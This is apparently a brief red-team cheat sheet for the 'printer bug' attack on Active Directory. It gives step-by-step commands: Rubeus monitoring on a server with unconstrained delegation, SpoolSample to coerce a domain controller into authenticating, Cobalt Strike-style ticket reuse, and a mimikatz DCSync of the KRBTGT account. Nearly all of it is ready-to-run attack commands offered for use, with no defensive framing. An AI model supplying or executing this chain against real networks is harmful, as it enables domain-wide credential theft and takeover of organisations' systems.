spooler_exploit
SPOOLER EXPLOIT Set Rubeus Monitor Mode
Run Spool Sample thinga ma jiggy do get dem dc's to do stuff to things
Extract the mf tickets automagically
Compromise Server Configured with unconstrained delegation
Begin Monitoring for delegated TGT's with Rubeus Monitor /interval:5
Coerce domain controller to authenticate to the unconstrained server using spoolsample
execute-assembly /opt/exe/Rubeus.exe monitor /interval:5 /filteruser:DC_parent
execute-assembly /opt/exe/SpoolSample.exe DC_parent DC_child
Wait for Rubeus to give us ticket
Make sacrificial login token e.g., make_token domain.local\DC_parent$ test_user Password123!
Use kerberos ticket - kerberos_ticket_use /opt/tickets/ticket.kirbi
DCSYNC stuff mimikatz @lsadump::dcsync /user:parent.local\KRBTGT
Last updated
Was this helpful?